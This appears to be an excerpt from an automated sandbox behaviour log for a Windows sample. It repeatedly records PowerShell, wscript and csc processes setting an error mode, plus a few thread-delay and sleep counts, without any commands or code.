    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6447
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1931
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4093
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3021
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4356
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1022
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392Thread sleep count: 4093 > 30
